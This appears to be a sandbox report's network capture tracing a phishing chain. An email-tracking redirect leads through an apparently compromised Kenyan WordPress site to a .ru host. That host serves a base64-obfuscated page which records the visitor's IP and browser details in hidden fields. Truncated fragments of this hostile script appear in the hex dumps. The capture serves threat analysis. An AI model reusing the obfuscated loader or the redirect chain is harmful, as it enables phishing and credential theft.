                                                May 30, 2024 12:21:09.593276978 CEST1.1.1.1192.168.2.40xea4eNo error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:30.012712002 CEST1.1.1.1192.168.2.40xdcd1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:21:30.012712002 CEST1.1.1.1192.168.2.40xdcd1No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:47.031960964 CEST1.1.1.1192.168.2.40xf5d2No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                May 30, 2024 12:21:49.859457970 CEST1.1.1.1192.168.2.40xc572No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                May 30, 2024 12:21:49.859457970 CEST1.1.1.1192.168.2.40xc572No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                • ipinfo.io
                                                • debssiebeads.co.ke
                                                • https:
                                                  • f8gxf.oritelos.ru
                                                  • code.jquery.com
                                                  • challenges.cloudflare.com
                                                  • www.google.com
                                                  • cdn.socket.io
                                                • fs.microsoft.com
                                                • a.nel.cloudflare.com
                                                • t.email1.gct.com
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.44973634.211.60.110804956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                May 30, 2024 12:20:38.290411949 CEST657OUTGET /r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/ HTTP/1.1
                                                Host: t.email1.gct.com
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate
                                                Accept-Language: en-US,en;q=0.9
                                                May 30, 2024 12:20:38.911174059 CEST788INHTTP/1.1 302 Found
                                                Content-Type: text/plain; charset=utf-8
                                                Date: Thu, 30 May 2024 10:20:38 GMT
                                                Location: https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475
                                                P3P: CP="CAO DSP COR CURa DEVa TAIa OUR BUS IND UNI COM NAV"
                                                Server: Apache
                                                Set-Cookie: AMCV_A89C776A5245B4080A490D44%40AdobeOrg=MCMID%7C45756572214084239353745868990065410047; Domain=gct.com; Path=/; Expires=Tue, 24-Jun-2025 10:20:38 GMT
                                                Set-Cookie: nlid=fffbb46|c90b147; Domain=gct.com; Path=/
                                                Set-Cookie: nllastdelid=c90b147; Domain=gct.com; Path=/; Expires=Tue, 24-Jun-2025 10:20:38 GMT
                                                X-Robots-Tag: noindex
                                                Content-Length: 17
                                                Connection: keep-alive
                                                Data Raw: 54 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64
                                                Data Ascii: Temporarily moved
                                                May 30, 2024 12:21:23.914146900 CEST6OUTData Raw: 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.44973734.211.60.110804956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                May 30, 2024 12:21:23.296886921 CEST6OUTData Raw: 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.44973034.117.186.192443
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:27 UTC59OUTGET / HTTP/1.1
                                                Host: ipinfo.io
                                                Connection: Keep-Alive
                                                2024-05-30 10:20:28 UTC513INHTTP/1.1 200 OK
                                                server: nginx/1.24.0
                                                date: Thu, 30 May 2024 10:20:27 GMT
                                                content-type: application/json; charset=utf-8
                                                Content-Length: 321
                                                access-control-allow-origin: *
                                                x-frame-options: SAMEORIGIN
                                                x-xss-protection: 1; mode=block
                                                x-content-type-options: nosniff
                                                referrer-policy: strict-origin-when-cross-origin
                                                x-envoy-upstream-service-time: 2
                                                via: 1.1 google
                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close
                                                2024-05-30 10:20:28 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                Data Ascii: { "ip": "8.46.123.175", "hostname": "static-cpe-8-46-123-175.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449740217.174.152.524434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:40 UTC830OUTGET /wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475 HTTP/1.1
                                                Host: debssiebeads.co.ke
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:40 UTC185INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:39 GMT
                                                Server: Apache
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-05-30 10:20:40 UTC1153INData Raw: 34 37 35 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6c 6f 61 64 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 67 65 74 20 74 68 65 20 76 61 6c 75 65 20 6f 66 20 61 20 70 61 72 61 6d 65 74 65 72 20 66 72
                                                Data Ascii: 475<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>File loading</title> <script> // Function to get the value of a parameter fr


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.449741217.174.152.524434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:41 UTC761OUTGET /favicon.ico HTTP/1.1
                                                Host: debssiebeads.co.ke
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://debssiebeads.co.ke/wp/?jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:43 UTC367INHTTP/1.1 302 Found
                                                Date: Thu, 30 May 2024 10:20:40 GMT
                                                Server: Apache
                                                Link: <https://debssiebeads.co.ke/wp-json/>; rel="https://api.w.org/"
                                                X-Redirect-By: WordPress
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Location: https://debssiebeads.co.ke/wp-content/uploads/2022/03/cropped-DB-Logo-32x32.png
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.449744188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:42 UTC691OUTGET /hIzc6w/ HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Referer: https://debssiebeads.co.ke/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:42 UTC1005INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:42 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: no-cache, private
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DQ04MCsQoG3DiuK%2FmddKDjmcc8Jk6G7tJ70FuNSwI1S7cLdneHuN12MFySixWF508OUB%2Fj1V4pMHW7bWwk7I%2BpqwjUPaQWUzrR9R02yxhmUY8wV32bpKQYb0tXy1LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik11Z0FaT29QLzNyb3R2OFhaek5PaXc9PSIsInZhbHVlIjoidmZyeXN3T29GQi9PR2NVeGlUc0I1MDgrZTdOcHhsVDg2ZVdWQWxEMWRMTXVFUDhzZ01HbVNEa3M5YVJ2SFhLSGowSVl5ZVJKaFl2WEZjbnU5S1JTQlFEWWVpR3dUcjAxb3hsTFIwVnR4NktsTEZ3QXdySVVRaDRnaW9IREFVZEciLCJtYWMiOiJlYmEwNDA3ZTA5MWMzNDkyOWU4NzJjNjAwYzc0Y2E5MjcwYzNkYWJjMTM0NzhlODJkOTQxM2FiNWUzMzI0ZjIzIiwidGFnIjoiIn0%3D; expires=Thu, 30-May-2024 12:20:42 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                2024-05-30 10:20:42 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 4a 6a 65 6d 70 35 53 31 4e 55 56 6d 74 51 5a 31 6c 6e 56 6c 63 79 4d 57 78 61 51 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4c 30 39 57 4d 31 42 43 62 6a 67 77 53 32 6c 53 52 6d 78 7a 61 44 51 32 5a 6d 52 30 52 30 52 78 53 56 5a 76 65 46 42 4d 5a 45 68 68 51 6d 6f 76 54 57 63 79 55 47 78 30 4b 32 39 68 51 6e 4e 33 52 6d 6c 47 55 55 4a 5a 52 6e 4e 48 63 30 68 34 62 53 39 71 65 45 46 74 54 7a 64 35 4f 58 6c 43 56 44 4e 54 65 6b 39 30 52 47 78 59 61 6c 55 77 65 6c 64 4e 4f 57 70 31 57 57 64 46 54 6a 4e 42 53 31 5a 5a 53 31 64 56 65 6e 64 6c 51 32 74 52 53 46 5a 72 5a 57 4e 43 52 32 5a 75 64 33 51 33 56 45 31 78 5a 57 6b 7a 4c 7a 55
                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImJjemp5S1NUVmtQZ1lnVlcyMWxaQ0E9PSIsInZhbHVlIjoiL09WM1BCbjgwS2lSRmxzaDQ2ZmR0R0RxSVZveFBMZEhhQmovTWcyUGx0K29hQnN3RmlGUUJZRnNHc0h4bS9qeEFtTzd5OXlCVDNTek90RGxYalUweldNOWp1WWdFTjNBS1ZZS1dVendlQ2tRSFZrZWNCR2Zud3Q3VE1xZWkzLzU
                                                2024-05-30 10:20:42 UTC1369INData Raw: 31 33 66 65 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47
                                                Data Ascii: 13fe<script>document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbG
                                                2024-05-30 10:20:42 UTC1369INData Raw: 64 47 38 37 64 32 6c 6b 64 47 67 36 4d 7a 4d 75 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 6c 4f 33 30 4e 43 6e 30 4e 43 69 4e 71 64 6d 46 48 62 6e 56 54 64 32 4e 33 49 43 35 6b 61 58 4e 77 62 47 46 35 4c 54 51 67 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 53 34 79 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 32 70 32 59 55 64 75 64 56 4e 33 59 33 63 67 4c 6d 31 30 4c 54 49 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 41 75 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 32 70 32 59 55 64 75 64 56 4e 33 59 33 63 67 4c 6d 67 30 49 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 47 4e 68 62 47 4d 6f 4c 6a 6b 77 4d 48 4a 6c 62 53 41 72 49 43 34 7a 64 6e 63 70 4f 33 30 4e 43 69 4e 71 64 6d 46
                                                Data Ascii: dG87d2lkdGg6MzMuMzMzMzMzMzMlO30NCn0NCiNqdmFHbnVTd2N3IC5kaXNwbGF5LTQge2ZvbnQtc2l6ZTogMS4yNXJlbSFpbXBvcnRhbnQ7fQ0KI2p2YUdudVN3Y3cgLm10LTIge21hcmdpbi10b3A6IDAuNXJlbSFpbXBvcnRhbnQ7fQ0KI2p2YUdudVN3Y3cgLmg0IHtmb250LXNpemU6IGNhbGMoLjkwMHJlbSArIC4zdncpO30NCiNqdmF
                                                2024-05-30 10:20:42 UTC1369INData Raw: 69 42 32 59 57 78 31 5a 54 30 69 4f 43 34 30 4e 69 34 78 4d 6a 4d 75 4d 54 63 31 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6b 5a 57 4a 7a 63 32 6c 6c 59 6d 56 68 5a 48 4d 75 59 32 38 75 61 32 55 76 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6b 31 76 65 6d 6c 73 62 47 45 76 4e 53 34 77 49 43 68 58 61 57 35 6b 62 33 64 7a 49 45 35 55 49 44 45 77
                                                Data Ascii: iB2YWx1ZT0iOC40Ni4xMjMuMTc1Ij4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iaHR0cHM6Ly9kZWJzc2llYmVhZHMuY28ua2UvIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEw
                                                2024-05-30 10:20:42 UTC1019INData Raw: 6c 70 4c 6d 39 75 63 33 56 69 62 57 6c 30 49 44 30 67 5a 6e 56 75 59 33 52 70 62 32 34 67 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6b 62 32 4e 31 62 57 56 75 64 43 35 6e 5a 58 52 46 62 47 56 74 5a 57 35 30 51 6e 6c 4a 5a 43 67 69 63 47 46 6e 5a 57 78 70 62 6d 73 69 4b 53 35 32 59 57 78 31 5a 53 41 39 49 43 64 68 65 57 5a 31 61 6e 56 6b 5a 53 63 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 5a 68 63 69 42 77 64 47 70 4e 54 58 46 47 63 6d 68 4c 49 44 30 67 49 69 34 75 4c 33 42 69 52 31 46 73 57 54 45 79 4e 33 41 32 61 44 42 30 63
                                                Data Ascii: lpLm9uc3VibWl0ID0gZnVuY3Rpb24gKGV2ZW50KSB7DQogICAgICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICB9Ow0KICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgicGFnZWxpbmsiKS52YWx1ZSA9ICdheWZ1anVkZSc7DQogICAgICAgIHZhciBwdGpNTXFGcmhLID0gIi4uL3BiR1FsWTEyN3A2aDB0c
                                                2024-05-30 10:20:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.449745184.28.90.27443
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:43 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                Accept-Encoding: identity
                                                User-Agent: Microsoft BITS/7.8
                                                Host: fs.microsoft.com
                                                2024-05-30 10:20:43 UTC467INHTTP/1.1 200 OK
                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                Content-Type: application/octet-stream
                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                Server: ECAcc (lpl/EF06)
                                                X-CID: 11
                                                X-Ms-ApiVersion: Distribute 1.2
                                                X-Ms-Region: prod-weu-z1
                                                Cache-Control: public, max-age=193694
                                                Date: Thu, 30 May 2024 10:20:43 GMT
                                                Connection: close
                                                X-CID: 2


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.449746151.101.194.1374434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:44 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                Host: code.jquery.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://f8gxf.oritelos.ru/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:44 UTC562INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 89501
                                                Server: nginx
                                                Content-Type: application/javascript; charset=utf-8
                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                ETag: "28feccc0-15d9d"
                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                Access-Control-Allow-Origin: *
                                                Via: 1.1 varnish, 1.1 varnish
                                                Accept-Ranges: bytes
                                                Age: 2920625
                                                Date: Thu, 30 May 2024 10:20:44 GMT
                                                X-Served-By: cache-lga21931-LGA, cache-ewr18145-EWR
                                                X-Cache: HIT, HIT
                                                X-Cache-Hits: 5746, 0
                                                X-Timer: S1717064444.208749,VS0,VE1
                                                Vary: Accept-Encoding
                                                2024-05-30 10:20:44 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                2024-05-30 10:20:44 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                2024-05-30 10:20:44 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
